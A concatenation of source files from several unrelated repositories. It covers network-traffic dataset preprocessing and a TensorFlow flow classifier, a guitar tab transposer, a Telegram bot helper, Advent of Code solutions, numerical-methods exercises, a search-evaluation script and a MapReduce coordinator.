set_logger.info("Testing dataset preprocessed.")
# Dumping testing features
with open(config.DUMPS_DIR + "test_X_" + str(n_steps) + ".np",
'wb') as f:
np.save(f, np.array(test_X, dtype=np.float32))
set_logger.info("Testing features dumped.")
del(test_X)
# Dumping testing labels
with open(config.DUMPS_DIR + "test_Y_" + str(n_steps) + ".np",
'wb') as f:
np.save(f, np.array(test_Y))
set_logger.info("Testing labels dumped.")
del(test_Y)
##############################
##############################
### Upload files
upload_file("datasets", "iscx_train_X_" + str(n_steps),
config.DUMPS_DIR + "train_X_" + str(n_steps) + ".np")
upload_file("datasets", "iscx_train_Y_" + str(n_steps),
config.DUMPS_DIR + "train_Y_" + str(n_steps) + ".np")
upload_file("datasets", "iscx_test_X_" + str(n_steps),
config.DUMPS_DIR + "test_X_" + str(n_steps) + ".np")
upload_file("datasets", "iscx_test_Y_" + str(n_steps),
config.DUMPS_DIR + "test_Y_" + str(n_steps) + ".np")
##############################
return None
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-steps", "--steps", help="Steps in sequence",
type=int, required=True)
main(n_steps=parser.parse_args().steps)
```
#### File: datasets/isot/load.py
```python
from . import config
from .logger import set_logger
from ..utils import shaping_utils
import pickle
def load(test_size, n_steps):
'''
Loads preprocessed data dump if possible.
'''
try:
#######################################
### Dataset load.
with open(config.DUMPS_DIR + "dataset_" + str(n_steps) + ".p", "rb") as f:
set_logger.info("Dataset exists. Processing...")
X, Y = pickle.load(f)
# Shuffle dataset
X, Y = shaping_utils.shuffle_twins(X, Y)
# Cut testing features
test_X = X[:test_size]
train_X = X[test_size:]
del(X)
# Cut testing labels
test_Y = Y[:test_size]
train_Y = Y[test_size:]
del(Y)
#######################################
return (train_X, train_Y), (test_X, test_Y)
except (EOFError, OSError, IOError) as e:
set_logger.info("Dataset does not exist. Returning None.")
return None
def load_full_test(n_steps):
'''
Loads preprocessed data dump for test if possible.
'''
try:
with open(config.DUMPS_DIR + "dataset_" + str(n_steps) + ".p", "rb") as f:
set_logger.info("Dataset exists. Processing...")
X, Y = pickle.load(f)
X, Y = shaping_utils.shuffle_twins(X, Y)
return X, Y
except (EOFError, OSError, IOError) as e:
set_logger.info("Dataset does not exist. Returning None.")
return None
```
#### File: src/models/flow_model.py
```python
from ..model_base import Base, SequenceLayers
import tensorflow as tf
class FlowModel(Base, SequenceLayers):
'''
Model for predicting on flows.
'''
def __init__(self, sess, flags, logger, **kargs):
logger.debug('Instantiated flow model')
Base.__init__(self, sess, flags, logger, **kargs)
def build_model(self):
'''
Build the flow model.
'''
self.logger.debug('Building model...')
flags = self.flags
self.x = tf.placeholder(
tf.float32, (flags.s_batch, flags.n_steps, flags.n_features))
self.target = tf.placeholder(tf.float32,
(flags.s_batch, flags.n_classes))
encoder_config = {
'n_batches': flags.s_batch,
'n_steps': flags.n_steps,
'n_features': flags.n_features,
'h_gru': flags.h_gru,
'h_dense': flags.o_gru
}
encoded_state = self._encoder_layer(
self.x, "encoder", encoder_config)
dense_config = {
'n_batches': flags.s_batch,
'n_input': flags.o_gru,
'n_hidden': flags.h_dense,
'n_output': flags.o_dense
}
dense_state = self._dense_layer(
encoded_state, "dense", dense_config)
predictor_config = {
'n_batches': flags.s_batch,
'n_input': flags.o_dense,
'n_classes': flags.n_classes
}
self.prediction = self._prediction_layer(
dense_state,
'predictor',
predictor_config)
self.loss = self._define_optimization_vars(
self.target,
self.prediction,
[1, 1],
flags.v_regularization
)
self.tpr, self.fpr, self.acc = self._define_binary_metrics(
self.target,
self.prediction,
)
optimizer = tf.train.AdamOptimizer()
self.optim = optimizer.minimize(
self.loss,
var_list=tf.trainable_variables(),
global_step=self.global_step)
self.logger.debug('Model built.')
return self
```
#### File: tests/model_base/broken_test_StandardLayers.py
```python
from ...src.model_base import StandardLayers
import tensorflow as tf
def test_prediction():
X = tf.placeholder(tf.float32, (3, 7))
predictor_config = {
'n_batches': 3,
'n_input': 7,
'n_classes': 5
}
prediction = StandardLayers()._prediction_layer(
X, 'predictor', predictor_config)
assert(prediction.shape == (3, 5))
assert(prediction.dtype == tf.float32)
def test_optimizations():
prediction = tf.placeholder(tf.float32, (3, 5))
target = tf.placeholder(tf.float32, (3, 5))
loss, acc = StandardLayers()._define_optimization_vars(
target, prediction, [1, 1, 0, 0, 1], 0.1)
assert(loss.shape == [])
assert(loss.dtype == tf.float32)
assert(acc.shape == [])
assert(acc.dtype == tf.float32)
def test_binary_metrics():
prediction = tf.placeholder(tf.float32, (3, 5))
target = tf.placeholder(tf.float32, (3, 5))
TPR, FPR, acc = StandardLayers()._define_binary_metrics(
target, prediction)
assert(TPR.shape == [])
assert(TPR.dtype == tf.float32)
assert(FPR.shape == [])
assert(FPR.dtype == tf.float32)
``` |
{
"source": "joaocmd/Tab-Transposer",
"score": 4
} |
#### File: joaocmd/Tab-Transposer/tab_transposer.py
```python
import re
def check_strs_in_line(line, strs):
"""string x list of strings -> bool. Returns whether any of the strings in strs is part
of the string line."""
for str in strs:
if str in line:
return True
return False
def replace_numbers_in_line(line, transpose_value):
"""string x int -> string. Returns a new string where the numbers found in line
are replaced by themselves - transpose_value."""
# Sorting so that we start replacing the lower numbers so that there are
# no conflicts
numbers = sorted(set(int(i) for i in re.findall(r"\d+", line)))
for n in numbers:
new_number = n-transpose_value
new_number_str = str(n-transpose_value)
if n >= 10 and new_number < 10:
#Add a dash to compensate the lost character
new_number_str = "-" + new_number_str
line = line.replace(str(n), new_number_str)
return line
def add_strings(l, msg):
"""list x string ->. Prints msg and appends each input line to l until it finds an emtpy
line."""
print(msg)
while True:
s = input();
if s == "":
break
l.append(s)
def main():
"""->. This is where the main program runs."""
file_name = input("File name (without \".txt\"): ")
tranpose_value = int(input("How many frets to transpose: "))
right_instrument = False
valid_strs = []
print("Press just enter to finish (with no trailing whitespace).\n")
add_strings(valid_strs, "Green light strings (e.g: Guitar 1): ")
if (len(valid_strs) == 0):
#Start replacing from the beginning.
right_instrument = True
invalid_strs = []
add_strings(invalid_strs, "Red light strings (e.g: Guitar): ")
f = open(file_name + ".txt", "r")
lines = f.readlines()
f.close()
new_file = open(file_name + "_new.txt", "w")
for line in lines:
if check_strs_in_line(line, valid_strs):
right_instrument = True
new_file.write(line)
elif check_strs_in_line(line, invalid_strs):
right_instrument = False
new_file.write(line)
elif right_instrument:
new_file.write(replace_numbers_in_line(line, tranpose_value))
else:
new_file.write(line)
new_file.close()
main()
``` |
{
"source": "joao-coimbra/cryptography-python",
"score": 4
} |
#### File: joao-coimbra/cryptography-python/utilities.py
```python
alphabet = list(map(chr, range(97, 123)))
def removeSpecialCharacters(phrase, result = ''):
for c in phrase:
if c == 'ã' or c == 'á' or c == 'à' or c == 'â' or c == 'ä':
result += 'a'
elif c == 'é' or c == 'è' or c == 'ê' or c == 'ë':
result += 'e'
elif c == 'í' or c == 'î' or c == 'ï' or c == 'ì':
result += 'i'
elif c == 'ó' or c == 'ò' or c == 'ô' or c == 'ö':
result += 'o'
elif c == 'ú' or c == 'ù' or c == 'ü':
result += 'u'
elif c == 'ç':
result += 'c'
else:
result += c
return result
``` |
{
"source": "joao-coimbra/easy-python-telegram",
"score": 2
} |
#### File: easy-python-telegram/telegram_chat/bot.py
```python
import telegram
import logging
import os
from telegram_chat.keys import *
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO
)
bot = telegram.Bot(
token=TELEGRAM_TOKEN
)
def sendMessage(text):
bot.sendMessage(
chat_id=CHAT_ID,
text=text
)
def sendImage(img, local=True):
if local:
bot.sendPhoto(
chat_id=CHAT_ID,
photo=open(f'{os.getcwd()}\\{img}', 'rb')
)
else:
bot.sendPhoto(
chat_id=CHAT_ID,
photo=img
)
``` |
{
"source": "joao-conde/advents-of-code",
"score": 3
} |
#### File: 2017/src/day20.py
```python
import re, math
from functools import reduce
input_file = open("input/day20")
particle_input = input_file.read().split("\n")
input_file.close()
def get_particle_properties(particle_id: int, particle_info: str):
pattern = "p=<(.*),(.*),(.*)>, v=<(.*),(.*),(.*)>, a=<(.*),(.*),(.*)>"
[px, py, pz, vx, vy, vz, ax, ay, az] = [
int(x) for x in re.findall(pattern, particle_info)[0]
]
return particle_id, {
"px": px,
"py": py,
"pz": pz,
"vx": vx,
"vy": vy,
"vz": vz,
"ax": ax,
"ay": ay,
"az": az,
}
# PART 1
particles_props = [
get_particle_properties(pid, particle_info)
for (pid, particle_info) in enumerate(particle_input)
]
particles_abs_accel = [
(math.sqrt(info["ax"] ** 2 + info["ay"] ** 2 + info["az"] ** 2), pid)
for pid, info in particles_props
]
particles_abs_accel.sort() # sorts by acceleration magnitude
print(f"Closest particle to <0,0,0> in the long term: {particles_abs_accel[0][1]}")
# PART 2 (gave up on quadratic solver based solution to find if two particles ever collide)
SIMULATION_STEPS = 500
axes = ["x", "y", "z"]
position_keys = ["<KEY>"]
for _ in range(SIMULATION_STEPS):
for _, p in particles_props:
for axis in axes:
p["v" + axis] += p["a" + axis]
p["p" + axis] += p["v" + axis]
collided = []
for pid1, p1 in particles_props:
for pid2, p2 in particles_props:
if pid1 == pid2:
continue
if reduce(lambda a, b: a and b, [p1[k] == p2[k] for k in position_keys]):
collided.extend([pid1, pid2])
particles_props = [(pid, _) for (pid, _) in particles_props if pid not in collided]
print(f"Particles left after all collisions are resolved: {len(particles_props)}")
```
#### File: 2017/src/day24.py
```python
input_file = open("input/day24")
components = input_file.read().split("\n")
components = [[int(pin) for pin in component.split("/")] for component in components]
input_file.close()
def find_bridges(components, bridge, bridges):
possibleNext = [
c
for c in components
if bridge[-1][1] in c and c not in bridge and [c[1], c[0]] not in bridge
]
if len(possibleNext) != 0:
for c in possibleNext:
cBridge = bridge.copy()
if cBridge[-1][1] == c[0]:
cBridge.append(c)
elif cBridge[-1][1] == c[1]:
cBridge.append([c[1], c[0]])
find_bridges(components, cBridge, bridges)
else:
bridges.append(bridge)
return bridges
# PART 1
startComponents = [c for c in components if 0 in c]
otherComponents = [c for c in components if 0 not in c]
bridges = []
for c in startComponents:
bridges.extend(find_bridges(otherComponents, [c], []))
bridgesSums = [sum([sum(c) for c in b]) for b in bridges]
print(f"Strongest bridge strength: {max(bridgesSums)}")
# PART 2
maxLenBridge = max([len(b) for b in bridges])
longestBridges = [b for b in bridges if len(b) >= maxLenBridge]
longestBridgesSums = [sum([sum(c) for c in b]) for b in longestBridges]
# print(f'Longest and strongest bridge strength *wink wink*: {max(longestBridgesSums)}')
``` |
{
"source": "JoaoCostaIFG/IART",
"score": 3
} |
#### File: Exercises/bucket_problem/ex1.py
```python
start_state = [0, 0]
end_state = [2, 0]
# OPERATORS
def empty_left(b):
return [0, b[1]]
def empty_right(b):
return [b[0], 0]
def fill_left(b):
return [4, b[1]]
def fill_right(b):
return [b[0], 3]
def pass_to_right(b):
left_to_full = 3 - b[1]
if left_to_full > b[0]:
amount = b[0]
else:
amount = left_to_full
return [b[0] - amount, b[1] + amount]
def pass_to_left(b):
left_to_full = 4 - b[0]
if left_to_full > b[1]:
amount = b[1]
else:
amount = left_to_full
return [b[0] + amount, b[1] - amount]
# DFS
def dfs(b, visited):
if b[0] == 2: # end state
return True
if b in visited: # already visited this node
return False
visited.append(b)
# empty
if b[0] > 0:
if dfs(empty_left(b), visited):
return True
if b[1] > 0:
if dfs(empty_right(b), visited):
return True
# fill
if b[0] < 4:
if dfs(fill_left(b), visited):
return True
if b[1] < 3:
if dfs(fill_right(b), visited):
return True
# pass
if b[0] > 0 and b[1] < 3:
if dfs(pass_to_right(b), visited):
return True
if b[0] < 4 and b[1] > 0:
if dfs(pass_to_left(b), visited):
return True
return False
visited = []
dfs(start_state.copy(), visited)
print(visited)
``` |
{
"source": "JoaoCostaIFG/MNUM",
"score": 4
} |
#### File: exams/2014/1_picard_1eq.py
```python
def recorr(x):
return (4 * x**3 - x + 1)**(1 / 4)
x = 4
print(x)
for i in range(2):
x = recorr(x)
print(x)
```
#### File: exams/2014/6_golden_rule.py
```python
from math import sin, sqrt
def f(x):
return x + ((x - 2)**2) / (sin(x) + 4)
B = (sqrt(5) - 1) / 2
A = B**2
x1 = -1
x2 = 1.5
x3 = -0.045080
x4 = 0.545085
# x3 = A * (x2 - x1) + x1
# x4 = B * (x2 - x1) + x1
print("x1:", x1, "x2:", x2, "x3:", x3, "x4:", x4)
print("f(x1)", f(x1), "f(x2)", f(x2), "f(x3)", f(x3), "f(x4)", f(x4), "\n")
for i in range(2):
if (f(x3) < f(x4)):
x2 = x4
x4 = x3
x3 = x1 + A * (x2 - x1)
else:
x1 = x3
x3 = x4
x4 = x1 + B * (x2 - x1)
print("x1:", x1, "x2:", x2, "x3:", x3, "x4:", x4)
print("f(x1)", f(x1), "f(x2)", f(x2), "f(x3)", f(x3), "f(x4)", f(x4), "\n")
```
#### File: exams/2015/1_euler1eq.py
```python
Ta = 37
def dTdt(t, T):
return -0.25 * (T - Ta)
t = 5
T = 3
h = 0.4 # aka delta_x
for i in range(2):
t += h
delta_T = dTdt(t, T) * h # aka delta_y
T += delta_T
print(t, T)
```
#### File: exams/2017/4c_euler.py
```python
from math import e
a = 30
b = 0.5
def dCdt(t, C, T):
return -e**(-b / (T + 273)) * C
def dTdt(t, C, T):
return a * e**(-b / (T + 273)) * C - b * (T - 20)
tf = 0.5
def euler(h):
t = 0
C = 2.5
T = 25
while (t < tf):
nT = T + dTdt(t, C, T) * h
nC = C + dCdt(t, C, T) * h
t += h
T = nT
C = nC
print("t:", t, "C:", C, "T:", T)
return T
h = 0.25
s = euler(h)
sl = euler(h / 2)
sll = euler(h / 4)
print("s:", s, "sl", sl, "sll", sll)
# QC
qc = (sl - s) / (sll - sl)
print("QC:", qc)
# ERR
erro = (sll - sl) / (2**1 - 1)
print("err:", erro)
```
#### File: MNUM/firsttest/q1b_2016.py
```python
import math
from time import sleep
def g(x):
return -(0.660 * x - 1) / (x - 1) + x
def gl(x):
temp = 50 * x**2 - 100 * x
return (temp + 33) / (temp + 50)
ERRR = 1e-10
x_old = False
x = 1.67
while (abs(x - x_old) > ERRR):
print("x:", x)
print("gl:", gl(x))
print()
x_old = x
x = g(x)
# sleep(1)
print("Final:", x)
```
#### File: my_tests/2019/up201806560-Joao-Costa-p4.py
```python
def dvdu(u, v):
return u * (u/2 + 1) * (v**3) + (u + 2.5) * (v**2)
# s
u = 1
v = 0.15
uf = 2
h = 0.1
while (u < uf):
v += dvdu(u, v) * h
u += h
s = v
print("h:", h, "u:", u, "v:", v)
# sl
u = 1
v = 0.15
uf = 2
h = 0.1/2
while (u < uf):
v += dvdu(u, v) * h
u += h
sl = v
print("h:", h, "u:", u, "v:", v)
# sll
u = 1
v = 0.15
uf = 2
h = 0.1/4
while (u < uf):
v += dvdu(u, v) * h
u += h
sll = v
print("h:", h, "u:", u, "v:", v)
# QC
QC = (sl - s) / (sll - sl)
print("QC:", QC)
# Erro
order_euler = 1
err = (sll - sl) / (2 ** order_euler - 1)
print("Erro:", err)
```
#### File: Pratical/Class03/bissecao.py
```python
def formula_resolvente1(a, b, c):
return (-b - (b**2 - 4 * a * c) ** (1/2)) / (2 * a)
def formula_resolvente2(a, b, c):
return (-b + (b**2 - 4 * a * c) ** (1/2)) / (2 * a)
def expr(x):
return 2 * x**2 - 5 * x - 2
def bissec(x, a, b, p):
print("Root:", x)
print("Erro absoluto max:", abs(b - a)/2)
medio = (a + b) / 2
while abs(b - a) > p:
medio = (a + b) / 2
if (expr(medio) * expr(a) <= 0):
b = medio
else:
a = medio
print("Result:", medio)
print("Erro absoluto:", x - medio)
return medio
bissec(formula_resolvente1(2, -5, -2), -1, 0, 1e-10)
print()
bissec(formula_resolvente2(2, -5, -2), 2, 3, 1e-10)
```
#### File: Pratical/Class03/picard-peano.py
```python
from time import sleep
def formula_resolvente1(a, b, c):
return (-b - (b**2 - 4 * a * c) ** (1/2)) / (2 * a)
def formula_resolvente2(a, b, c):
return (-b + (b**2 - 4 * a * c) ** (1/2)) / (2 * a)
def expr(x):
# 2x^2 - 5x - 2
return 2 * x**2 - 5 * x - 2
def g(x):
# return 0.4 * (x**2 - 1)
return -(2.5 * x + 1)**0.5
def newton(s, x, p):
print("root:", s)
# print("erro absoluto max:", abs(b - a) / 2)
print()
while abs(x - s) > p:
x = g(x)
print("Erro:", abs(x - s))
sleep(0.3)
print("result:", x)
print("erro absoluto:", x - s)
return x
# newton(formula_resolvente1(2, -5, -2), -0.3, 1e-10)
# print("\n")
newton(formula_resolvente2(2, -5, -2), 2.85, 1e-10)
```
#### File: Pratical/Class09/euler_melhorado.py
```python
import math
import matplotlib.pyplot as plt
def f(x, y):
return math.pow(math.sin(x), 2)
def qc(a, b, h, f, xn, metodo):
s = metodo(a, b, h, f, xn)
sl = metodo(a, b, h/2, f, xn)
sll = metodo(a, b, h/4, f, xn)
print("qc\nerro")
qc = []
for i in range(len(s)):
numerator = sll[i*4][1] - sl[i*2][1]
if numerator == 0:
qc.append("div by 0")
print(qc[i])
continue
else:
qc.append((sl[i*2][1] - s[i][1]) / numerator)
print(qc[i], abs(qc[i] - 16))
print()
plt.show()
return qc
def rk4(x, y, dltx, f, xf, doplot=True):
points = [(x, y)]
while (x < xf):
x += dltx
dlt1 = dltx * f(x, y)
dlt2 = dltx * f(x + dltx/2, y + dlt1/2)
dlt3 = dltx * f(x + dltx/2, y + dlt2/2)
dlt4 = dltx * f(x + dltx, y + dlt3)
y += dlt1/6 + dlt2/3 + dlt3/3 + dlt4/6 # y += y + dlty
points.append((x, y))
if doplot:
x, y = zip(*points)
plt.scatter(x, y, marker=".")
return points
def euler_helper(x, y, x2, y2, dltx, step):
dltx /= step
for i in range(step):
yl = f(x2, y2)
pn = y + 2 * yl * dltx
pln = f(x2, pn)
dlty = (pln + yl) / 2 * dltx
x = x2
y = y2
x2 = x + dltx
y2 = y + dlty
return y
def euler_melhorado(x, y, x2, y2, dltx, f, xf, doplot=True):
points = [(x, y)]
while (x < xf):
yl = f(x2, y2)
pn = y + 2 * yl * dltx
pln = f(x2, pn)
dlty = (pln + yl) / 2 * dltx
sll = euler_helper(x, y, x2, y2, dltx, 4)
sl = euler_helper(x, y, x2, y2, dltx, 2)
numerator = sl - (y2 + dlty)
if numerator:
kc = (sll - sl) / (sl - (y2 + dlty))
else:
kc = 2
if (abs(kc - 2) < 8):
x = x2
y = y2
x2 = x + dltx
y2 = y + dlty
points.append((x, y))
else:
dltx -= 0.1
if doplot:
x, y = zip(*points)
plt.scatter(x, y, marker=".")
return points
x = 0
y = 0
rk4res = rk4(x, y, 0.001, f, 1, False)
x2 = rk4res[-1][0]
y2 = rk4res[-1][1]
h = 1
xf = 20
euler_melhorado(x, y, x2, y2, h, f, xf, True)
plt.show()
```
#### File: Pratical/Class10/tercos-aurea.py
```python
from math import sin, sqrt
limm = 1e-5
def f(x):
return sin(x) ** 2
def const_search(xi, xf, h):
print("const_search")
# change direc if necessary
if (f(xi) < f(xi + h)):
h = -h
while f(xi) > f(xi + h):
xi += h
print("xi:", xi, "h:", h)
return xi
def inc_search(xi, xf, h):
print("inc_search")
# change direc if necessary
if (f(xi) < f(xi + h)):
h = -h
while f(xi) > f(xi + h):
h *= 2
xi += h
print("xi:", xi, "h:", h)
return xi
def adjust(xi, xf, xm):
# Adjust 3 points to parabola
result = xf + ((xm - xf) * (f(xi) - f(xm))) / \
(2 * (f(xm) - 2 * f(xf) + f(xi)))
print(result)
return result
def tercos(xi, xf):
# doing 10 iterations cause it seems OK for this problem
print("Tercos:")
lastx = 0
for i in range(10):
h = (xf - xi) / 3
x3 = xi + h
x4 = xf - h
if f(x4) < f(x3):
xi = x3
lastx = x4
elif f(x3) <= f(x4):
# TODO caso do ==
# podemos abandonar ambos os extremos do intervalo
xf = x4
lastx = x3
print("xi:", xi, "xf:", xf)
print("fi:", f(xi), "ff:", f(xf))
return (xi, xf, lastx)
def aurea(xi, xf):
# doing 10 iterations cause it seems OK for this problem
print("Aurea:")
B = (sqrt(5) - 1) / 2 # golden ratio
A = B ** 2
lastx = 0
x3 = xi + A * (xf - xi)
x4 = xi + B * (xf - xi)
for i in range(10):
if f(x4) < f(x3):
xi = x3
lastx = x3 = x4
x4 = x3 + B * (xf - x3)
elif f(x3) <= f(x4):
xf = x4
lastx = x4 = x3
x3 = xi + B * (xf - xi)
print("xi:", xi, "xf:", xf)
print("fi:", f(xi), "ff:", f(xf))
return (xi, xf, lastx)
# f is convex from -1 to 1
xi = -1
xf = 1
h = 0.1
# tercos
xi = const_search(xi, xf, h)
points = tercos(xi, xf)
result = adjust(*points) # the star (*) unpacks the sequence
# f is convex from -1 to 1
xi = -1
xf = 1
h = 0.1
# aurea
xi = const_search(xi, xf, h)
points = aurea(xi, xf)
result = adjust(*points) # the star (*) unpacks the sequence
``` |
{
"source": "JoaoCostaIFG/PRI",
"score": 3
} |
#### File: PRI/Proj/db2json.py
```python
import pandas as pd
import sqlite3
conn = sqlite3.connect("data/data.db")
df_story = pd.read_sql_query("Select * from Story", conn)
df_type = pd.read_sql_query("Select * from Type", conn)
df_url = pd.read_sql_query("Select * from Url", conn)
df = df_story.join(df_type, on="story_type")
df = df.merge(df_url, left_on="story_id", right_on="url_story", how="left")
df["story_time"] = pd.to_datetime(df["story_time"], unit="s")
df["story_time"] = df["story_time"].dt.strftime("%Y-%m-%dT%H:%M:%S")
df.drop(["story_type", "type_id", "url_id", "url_story"], axis=1, inplace=True)
df.rename(
columns={
"story_by": "story_author",
"type_name": "story_type",
"url_url": "url",
},
inplace=True,
)
def filter_comments(id):
df_slice = df_comment[df_comment["comment_parent"] == id].copy()
df_slice.drop(["comment_parent"], axis=1, inplace=True)
df_slice["comment_time"] = pd.to_datetime(df_slice["comment_time"], unit="s")
df_slice["comment_time"] = df_slice["comment_time"].dt.strftime("%Y-%m-%dT%H:%M:%S")
df_slice.rename(
columns={
"comment_by": "comment_author",
},
inplace=True,
)
return df_slice
df_comment = pd.read_sql_query("Select * from Comment", conn)
df["comments"] = df["story_id"].map(filter_comments)
df.to_json("hackersearch.json", orient="records")
```
#### File: Proj/evaluation/evaluate.py
```python
from string import ascii_uppercase as alphabet
import sys
import json
def ap(docs, n=10):
"""Average Precision"""
precision_values = [
len([
doc
for doc in docs[:idx]
if doc["relevant"] == "true"
]) / idx
for idx in range(1, n + 1)
]
return sum(precision_values) / len(precision_values)
def ap(docs, n=10):
"""Average Precision"""
precision_values = [
len([
doc
for doc in docs[:idx]
if doc["relevant"] == "true"
]) / idx
for idx in range(1, n + 1)
]
return sum(precision_values) / len(precision_values)
def p10(docs, n=10):
"""Precision at N"""
return len([doc for doc in docs[:n] if doc['relevant'] == "true"]) / n
def rec(docs, n=10):
"""Recall"""
len_relevant = getNoRelevants(docs)
return len([
doc for doc in docs[:n]
if doc['relevant'] == "true"
]) / len_relevant
def fB(docs, beta, n=10):
"""F1 Score"""
precision = p10(docs, n)
recall = rec(docs, n)
return (1 + beta ** 2) * (precision * recall) / ((beta ** 2 * precision) + recall)
def getNoRelevants(docs):
return sum([doc["relevant"] == "true" for doc in docs])
def gen_precisions(docs, n=10):
return [getNoRelevants(docs[:idx]) / idx
for idx, _ in enumerate(docs[:n], start=1)]
def gen_recalls(docs, n=10):
len_relevant = getNoRelevants(docs)
return [
len([
doc for doc in docs[:idx]
if doc['relevant'] == "true"
]) / len_relevant
for idx, _ in enumerate(docs[:n], start=1)
]
def get_precision_recalls(docs, n=10):
import numpy as np
recall_values = gen_recalls(docs, n)
precision_values = gen_precisions(docs, n)
# Let's scatterplot all recall-precision values
# And lineplot using sklearn the curve with intermediate steps
recall_precision_dict = {
recall_values[i]: precision_values[i] for i in range(len(recall_values))}
# Extend recall_values to include traditional steps for a better curve(0.1, 0.2 ...)
extended_recall = recall_values.copy()
extended_recall.extend([step for step in np.arange(
0.1, 1.1, 0.1) if step not in recall_values])
extended_recall = sorted(set(extended_recall))
# Extend matching dict to include these new intermediate steps
for idx, step in enumerate(extended_recall):
if step not in recall_precision_dict: # If we don't have info on this step
if extended_recall[idx-1] in recall_precision_dict:
recall_precision_dict[step] = recall_precision_dict[extended_recall[idx-1]]
else:
recall_precision_dict[step] = recall_precision_dict[extended_recall[idx+1]]
# Values with 0 must be verified, idk why
if 0 not in recall_precision_dict:
recall_precision_dict[0] = recall_precision_dict[0.1]
return recall_values, precision_values, recall_precision_dict
# Plots multiple recall-precision plots, for each doc
def plot_recall_precision(recalls_precisions, legends=[], markers=["s", "o", "^", "D"]):
import matplotlib.pyplot as plt
from sklearn.metrics import PrecisionRecallDisplay
a = plt.figure()
axes = a.add_axes([0.1, 0.1, 0.8, 0.8])
# Use dict with extended values to draw line
i = 0
for recalls, precisions, recall_dict in recalls_precisions:
recall_keys = sorted(list(recall_dict.keys()))
precision_values = [recall_dict[key] for key in recall_keys]
disp = PrecisionRecallDisplay(precision_values, recall_keys)
d = disp.plot(ax=axes)
axes.set_ylim([-0.01, 1.01])
# plt.scatter(recalls, precisions, marker=markers[i])
i += 1
# Need to set scatter plots to no_legend
# insert_legends = []
# for legend in legends:
# insert_legends.append(legend)
# insert_legends.append('_nolegend_')
plt.gca().legend((legends))
plt.tight_layout()
plt.savefig("precision_recall", bbox_inches='tight')
plt.show()
def calc_metrics(data):
print("Average Precision: {:.2%}".format(ap(data["docs"])))
print("P@10: {:.2%}".format(p10(data["docs"])))
print("Recall: {:.2%}".format(rec(data["docs"])))
print("Fβ: {:.2%}".format(fB(data["docs"], 0.5)))
""" Checks if a document has an unset relevance score"""
def check_doc(docs, label):
def has_relevancy(doc):
return doc["relevant"] == "true" or doc["relevant"] == "false"
for i in range(len(docs)):
if not has_relevancy(docs[i]):
print("File " + label + ", document no " +
str(i) + " has invalid relevant type")
exit(1)
def usage():
print("Usage: ./evaluate.py <qrel1 label1 qrel2 label2 ...>")
exit(-1)
if len(sys.argv) == 1:
usage()
jsons = []
labels = []
for i in range(1, len(sys.argv[1:]), 2):
# Load args
file = sys.argv[i]
label = sys.argv[i + 1]
# Load json
f = open(file)
data = json.load(f)
# Check doc validity
check_doc(data["docs"], file)
jsons.append(data)
id = alphabet[i // 2]
labels.append(str("System " + id + " - " + label))
recalls_precisions = []
for data in jsons:
calc_metrics(data)
recalls_precisions.append(get_precision_recalls(data["docs"]))
plot_recall_precision(recalls_precisions, labels)
``` |
{
"source": "joaocps/map-reduce",
"score": 3
} |
#### File: joaocps/map-reduce/coordinator.py
```python
import csv
import json
import logging
import argparse
import socket
import threading
from queue import Queue
import locale
import time
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M:%S')
logger = logging.getLogger('coordinator')
class Coordinator(object):
def __init__(self):
# -----------
# Coordinator Socket
# -----------
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.logger = logging.getLogger('Coordinator')
# -----------
# Datastore of initial blobs
# -----------
self.datastore = []
self.datastore_q = Queue()
# -----------
# Queue of Map responses from worker
# -----------
self.map_responses = Queue()
# -----------
# Queue of Reduce responses from worker
# -----------
self.reduce_responses = Queue()
# -----------
# Not used Variables but maybe usefull later
# -----------
self.ready_workers = []
self.map_jobs = True
def jobs_to_do(self, clientsocket):
# If ready_workers > 0 start!
map_req = json.dumps(dict(task="map_request", blob=self.datastore_q.get()))
size1 = len(map_req)
clientsocket.sendall((str(size1).zfill(8) + map_req).encode("utf-8"))
while True:
bytes_size = clientsocket.recv(8).decode()
xyz = int(bytes_size)
new_msg = clientsocket.recv(xyz).decode("utf-8")
if new_msg:
msg = json.loads(new_msg)
# print(new_msg)
if msg["task"] == "map_reply":
if not self.datastore_q.empty():
self.map_responses.put(msg["value"])
map_req = json.dumps(dict(task="map_request", blob=self.datastore_q.get()))
size = len(map_req)
clientsocket.sendall((str(size).zfill(8) + map_req).encode("utf-8"))
else:
self.map_responses.put(msg["value"])
# print("toda")
# print(list(self.map_responses.queue))
reduce_req = json.dumps(dict(task="reduce_request", value=(self.map_responses.get(),
self.map_responses.get())))
size = len(reduce_req)
clientsocket.sendall((str(size).zfill(8) + reduce_req).encode("utf-8"))
elif msg["task"] == "reduce_reply":
self.reduce_responses.put(msg["value"])
if not self.map_responses.empty():
if self.map_responses.qsize() == 1:
reduce_req = json.dumps(dict(task="reduce_request", value=(self.map_responses.get(),
self.reduce_responses.get())))
size = len(reduce_req)
clientsocket.send((str(size).zfill(8) + reduce_req).encode("utf-8"))
elif self.map_responses.qsize() > 1:
reduce_req = json.dumps(dict(task="reduce_request", value=(self.map_responses.get(),
self.map_responses.get())))
size = len(reduce_req)
clientsocket.send((str(size).zfill(8) + reduce_req).encode("utf-8"))
else:
if self.reduce_responses.qsize() > 1:
reduce_req = json.dumps(dict(task="reduce_request", value=(self.reduce_responses.get(),
self.reduce_responses.get())))
print(reduce_req)
size = len(reduce_req)
clientsocket.send((str(size).zfill(8) + reduce_req).encode("utf-8"))
elif self.reduce_responses.qsize() == 1:
print("Job Completed, Waiting for workers to collect words and write file, please wait!")
time.sleep(10)
locale.setlocale(locale.LC_COLLATE, "pt_PT.UTF-8")
hist = self.reduce_responses.get()
palavras = []
final = []
for p in hist:
palavras.append(p[0])
f = sorted(palavras, key=locale.strxfrm)
# print(f)
for t in f:
for i in hist:
if i[0] == t:
final.append(i)
# store final histogram into a CSV file
with args.out as f:
csv_writer = csv.writer(f, delimiter=',',
quotechar='"', quoting=csv.QUOTE_MINIMAL)
for w, c in final:
csv_writer.writerow([w, c])
print("DONE, Output file created!")
def main(self, args):
with args.file as f:
while True:
blob = f.read(args.blob_size)
if not blob:
break
# This loop is used to not break word in half
while not str.isspace(blob[-1]):
ch = f.read(1)
if not ch:
break
blob += ch
logger.debug('Blob: %s', blob)
self.datastore.append(blob)
self.datastore_q.put(blob)
